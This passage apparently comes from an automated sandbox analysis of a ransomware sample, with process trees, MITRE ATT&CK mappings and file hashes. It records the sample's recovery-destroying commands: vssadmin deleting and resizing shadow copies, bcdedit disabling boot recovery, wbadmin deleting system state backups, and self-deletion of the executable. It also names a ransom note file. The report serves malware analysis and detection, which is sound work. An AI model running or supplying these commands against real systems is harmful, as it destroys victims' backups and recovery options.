  vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3244
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:736
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1488
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4828
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4220
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:828
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:1148
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4960
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2116
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:920
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:4764
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\CC3652~1.EXE >> NUL
  2⤵
  PID:4844

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2367C848C1C8A11F6F3502EDA2855348.gpay

Filesize
824B

MD5
cfd5dce9cc724c94f81ed09deb8f3902

SHA1
49cddbd426def23e877db7fb50c60b5ddcc6626f

SHA256
965d9144b9438645c8bcf105aa8c8d671d1aad61a9388225aa56f20b7adbf6c4

SHA512
9f7a4a0b7e428d54e6a57cb003a38c01cf033724d98f1989f6e037a5c3dbba82ecaf14a776193fc7f04c60f0dfa8479b0ebd2cdc61c1953d6c18c03dae58e420

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\398EE64D66758B5715368AA94044B13A.gpay

Filesize
710B

MD5
dde54ea2cd8b40389ce13536b4cbe8c3

SHA1
3473db49c609997aa37c1a56aa24b14ab76fa928

SHA256
482e2840947f24448f75f99d5ab45215b1e352252525dc921ef2f003d7360388

SHA512
0178759e0f040a49943d70f08760ff291a4f79a849fd60cd932ca30a61486a0daf5fda170bdfdc7e35594f01f8b21f21a6874b0ac5981692621b8ff7e39184a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.gpay

Filesize
814B

MD5
975834e0499feb44654b97f204ccc6b7

SHA1
ddb467be5873ab21f473866cae0624a9ab452911

SHA256
ef931c66da099d7035facbe2e4c5f09e0b70dd1284b8cd075cf0f053ce9b9db8

SHA512
6661783098255e9fad40d2a6ccd59e701a25d7fd21b24afe5fad8f3a5e11d3b8538e484140202ae39ecda2f0fd175e6280aaac598c2d6fec6022b513ef0e21e7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506.gpay

Filesize
840B

MD5
20d1844c7a721af7095a740465079aab

SHA1
d98f4a5bded46ba580881737cadaa67e015d44ea

SHA256
322850b3a7233d06e01f0e2a9770dba7bf82c88ec9ed6cae5d673ad01e2dd841

SHA512
f0e8ee3675592a1548a478ebe9c1319880d3f1aadf64e9bd4ccd38e00a6f632643ceacb60fe46f4da7131dce503ef898709fc7a0caadd08e4e61e85b92e96a9d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F.gpay

Filesize
700B

MD5
524a97f5cb8ea24fdc4b25b8f8405e97

SHA1
478868cc38476c2800ba7752480ab93016c40f2b

SHA256
c1fb17d4f1584c71aa4bda4f9dc1eaf8a2c409ab83a9ea51fffa8b855a353661

SHA512
7d8b7a6dee755bf1439733aa15357525008b0a0fbdbc984427239bbe120419730078397d29358050c8a026f7580b36d76a4c5ef9228041aa3dc6274faa89683b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BBDF33C7.gpay

Filesize
770B

MD5
15cb71840b844b0339a6603f1b1a78e7

SHA1
89d8ce40511b0b070fd0d28c475ae68e07d4616e

SHA256
d18b2a9c15873d0e5d7efb6ae05581d09b5279e420bfe5ba0fc5d2240c9bf77f

SHA512
b6fa84dcd5d2eeccd956f7424de62a06786eff08974646bc35e7b04addfeda79383377a97bf4029db008b56f0ac9f3185b6d86e28dfa98cdcb61287b7cafa9ae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
290B

MD5
f755ab1073ad912ff16960c0a1763967

SHA1
ed4f8f40c6d46b08c7417cdfccb9cac16cfd03e8

SHA256
aac549c86409fdfcde6c8de9368a16dbaa13296218f3bb2db0f895080031a5cc

SHA512
dc8193d921c13969878b098dfe396020da437b6a1b2bd283953a2a4cc943b46d9874a4206fbe3f26b820ddb01eaee5acf3e93520cee8c63e37d5745927cc55d8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749.gpay

Filesize
842B

MD5
2f58d6778adb8b40947a6c4463800da2

SHA1
87ffe44b7041f1b8bc89e64be8494f6d4b67f17a

SHA256
69e3c4fcf4638052f383d7d697828f05af5ba5e0e4051a6f717e4fc3061dd37f

SHA512
314c474b8333efc30704612ec5c4c06af319406f5f21c9911977526bc541577452ead5f00581e320c361673736f62ba32d7a2c8d8f3143a663ef56f312abffe6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E.gpay

Filesize
782B

MD5
e3829caf717b29c5c9db8a1fe3150a09

SHA1
06bb57161b91fb647a3e8431a111133759ea1ad1

SHA256
738cedd288c80aaaed4619db4476c77c2342192f40ba2dc92bb532bbc6e40f81

SHA512
2e0298a0f96929a457248c3261fc8d691a6acc4fbc07a1d08751082a6a303fe6418885b6f2227d12455ac98f9ebbe9c7dd2769a2526f0218c4371590ff410939

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157.gpay

Filesize
850B

MD5
a3087921ed9b29655464711a03bf15bf

SHA1
602cc06dd940bce592e28f1dd3509d7026973844

SHA256
61ad93d3339eb6abd1f423f7fef50cda4d5b4d7c878bb7da2c41be4487b6ae96

SHA512
b8efbd654c9b8c7c90da38957a86b45ba73ab720127f423d227e31d3c2435bb93260049d0a22f0fb5ba8a53afcf13695bbc69e8c87ba5016db3d01c8de019edc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506.gpay

Filesize
802B

MD5
20218d6b7e82fb442dd05069dfed321d

SHA1
da414a9b729e8b20863ca91965bb4e1fc0df534c

SHA256
b5c70bef2bd2720659b787808b53cb5ab4bad36dc23e6dc07815b166e38e5778

SHA512
15e923894008bc7ddfd7b1fdc44da174ebfbb150f6746cab3f8e45638574d78fdedc0159c425ee4c297dea6d936d57a5bc63d97f07b2cf9a80e6a828dffc48b6

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749.gpay

Filesize
842B

MD5
cb9f2daaaa1dce8186ea135e00d9b29d

SHA1
ca7988e3e76efb03d92f1247d5593ae968baa7c1

SHA256
e687c94b190258c51dbf46f2951e1fdf1fe5c86ab7c778fe3b3dc24675f9f330

SHA512
0bacc5ce73b739d485cccda18dd27ab19f54b514bc0d446413752ac2e8651cd749ed31d4ee45bf1da12ac7e302d0cb2f478988bc77ced195b6f4e856113d0a80

Download Submit
\Device\HarddiskVolume1\Boot\bg-BG\!!!HOW_TO_DECRYPT!!!.mht

Filesize
4KB

MD5
28819d45b71f3198a258260522dff2e6

SHA1
d07cf355ba82439e59f3bf2b3a0447ed5a77474d

SHA256
30c49fa42f659e56615f1cb6c65e4766eec7f7f9a1d9c6f03f222f3bacd82b2f

SHA512
cb55f830428e89f863f25aaad04031fdd139d66061b05cba44ce48b81cb27337d08c19021cf73b04b1e33cdecadaef9aa5b268d850146039821d2cfa719b1406

Download Submit
memory/304-831-0x00000278105A0000-0x00000278105B0000-memory.dmp

Filesize
64KB

Download
memory/304-825-0x0000027810540000-0x0000027810550000-memory.dmp

Filesize
64KB

Download